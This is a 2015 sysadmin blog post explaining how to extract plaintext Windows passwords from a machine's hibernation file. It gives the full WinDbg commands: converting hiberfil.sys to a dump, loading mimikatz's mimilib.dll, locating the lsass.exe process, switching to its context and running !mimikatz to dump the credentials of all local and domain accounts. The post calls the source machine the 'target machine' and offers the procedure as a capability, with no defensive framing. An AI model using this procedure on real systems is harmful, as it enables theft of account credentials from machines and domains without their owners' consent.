Windows OS Hub
  • Windows Server
    • Windows Server 2016
    • Windows Server 2012 R2
    • Windows Server 2012
    • Windows Server 2008 R2
    • SCCM
  • Active Directory
    • Group Policies
  • Windows Clients
    • Windows 10
    • Windows 8
    • Windows 7
    • MS Office
    • Outlook
  • Virtualization
    • VMWare
    • Hyper-V
  • PowerShell
  • Exchange
  • Home
  • About

Windows OS Hub

  • Windows Server
    • Windows Server 2016
    • Windows Server 2012 R2
    • Windows Server 2012
    • Windows Server 2008 R2
    • SCCM
  • Active Directory
    • Group Policies
  • Windows Clients
    • Windows 10
    • Windows 8
    • Windows 7
    • MS Office
    • Outlook
  • Virtualization
    • VMWare
    • Hyper-V
  • PowerShell
  • Exchange

 Windows OS Hub / Security / How to Extract Windows User Passwords from Hiberfil.sys

April 22, 2015 Security

How to Extract Windows User Passwords from Hiberfil.sys

Mimikatz, a tool that allows to extract Windows credentials  as plain text from LSA, is available since 2012. However, besides a well-covered feature of recovering passwords from the memory of a running OS, it has another interesting capability. Further a step-by-step instructions are given, how to easily extract the Windows users credentials data from hiberfil.sys file.

Preparation

To follow these instructions we’ll need the following tools:

  1. Debugging Tools for Windows (WinDbg)
  2. Windows Memory toolkit free edition
  3. And mimikatz itself

Instructions

  1. Get hiberfil.sys from the target machine.
  2. Convert it into a format WinDbg can work with: hibr2dmp.exe
    d:\temp\hiberfil.sys c:\temp\hiberfil.dmp

    d:\temp\hiberfil.sys c:\temp\hiberfil.dmp

    It can take some time (in our example, it took about 14 hours).
    hibr2dmp.exe - Convert hiberfile.sys to dmp format

  3. Run WinDbg and open the file you got in the previous step.File -> Open Crash Dump
  4. Set the debug symbols.Open File -> Symbol File Path… and enter the next line:SRV*c:\symbols*http://msdl.microsoft.com/download/symbols

    WinDbg: set Symbol Search Path

    You can specify any other directory to which the symbols are to be downloaded instead of c:\symbols

    Type the following in the debugger command prompt:

    0: kd> .reload /n

    0: kd> .reload /n

    Wait till the symbol download is completed:

    Debugging Tools for Windows : load-kernel symbols

  5. Specify the path to mimilib.dll. (It is located in the same directory as mimikatz.)
    0: kd> .load z:\Sft\Security\Password\Mimikatz\x64\mimilib.dll

    0: kd> .load z:\Sft\Security\Password\Mimikatz\x64\mimilib.dll

    WinDbg: load mimikatz dll (mimilib.dll)

  6. Find the address of lsass.exe.
    0: kd> !process 0 0 lsass.exee

    0: kd> !process 0 0 lsass.exee

    WinDbg: find lsass.exe process

    In our case the address is as follows: fffffa800a7d9060.

  7. Switch the process context.
    0: kd> .process /r /p fffffa800a7d9060

    0: kd> .process /r /p fffffa800a7d9060

    Switch to process context in WinDbg

  8. Run mimikatz and obtain plaint text passwords.
    0:kd> !mimikatz

    0:kd> !mimikatz

    Get plaintext Windows users passwords from hiberfile.sys

This way you can extract from the hibernation file passwords of all local and domain accounts, registered in the system.

1 comment
0
Facebook Twitter Google + Pinterest
previous post
How to Remove an Inactive NFS Datastore on VMWare ESXi Host
next post
Display Last Logon Info on the Windows Welcome Screen

Related Reading

Zerologon (CVE-2020-1472): Critical Active Directory Vulnerability

December 4, 2020

How to Disable NTLM Authentication in Windows Domain?

September 24, 2019

Secure Password (Credentials) Encryption in PowerShell Scripts

August 20, 2019

Securing Administrative (Priveleged) Accounts in Active Directory

March 27, 2018

How to Obtain SeDebugPrivilege when Debug Program Policy...

December 28, 2017

1 comment

Keegoal August 13, 2015 - 1:50 pm

We’ve analyzed the hiberfil.sys file format of Windows 8, and will release a Decompressor a month later. Anybody who want to joint us or want to own the Decompressor may mail to us, flyingdreaming@bupt.edu.cn.

Reply

Leave a Comment Cancel Reply

Categories

  • Active Directory
  • Group Policies
  • Exchange
  • Windows 10
  • Windows 8
  • Windows 7
  • Windows Server 2016
  • Windows Server 2012 R2
  • Windows Server 2008 R2
  • PowerShell
  • VMWare
  • MS Office

Recent Posts

  • How to Sign a PowerShell Script (PS1) with a Code Signing Certificate?

    February 25, 2021
  • Change the Default Port Number (TCP/1433) for a MS SQL Server Instance

    February 24, 2021
  • How to Shadow (Remote Control) a User’s RDP session on RDS Windows Server 2016/2019?

    February 22, 2021
  • Configuring PowerShell Script Execution Policy

    February 18, 2021
  • Configuring Proxy Settings on Windows Using Group Policy Preferences

    February 17, 2021
  • Updating Group Policy Settings on Windows Domain Computers

    February 16, 2021
  • Managing Administrative Shares (Admin$, IPC$, C$, D$) in Windows 10

    February 11, 2021
  • Packet Monitor (PktMon) – Built-in Packet Sniffer in Windows 10

    February 10, 2021
  • Fixing “Winload.efi is Missing or Contains Errors” in Windows 10

    February 5, 2021
  • How to Move (Clone) Windows to a New Hard Drive (HDD/SSD)?

    February 4, 2021

Follow us

woshub.com
  • Facebook
  • Twitter
  • RSS
Popular Posts
Footer Logo

@2014 - 2018 - Windows OS Hub. All about operating systems for sysadmins


Back To Top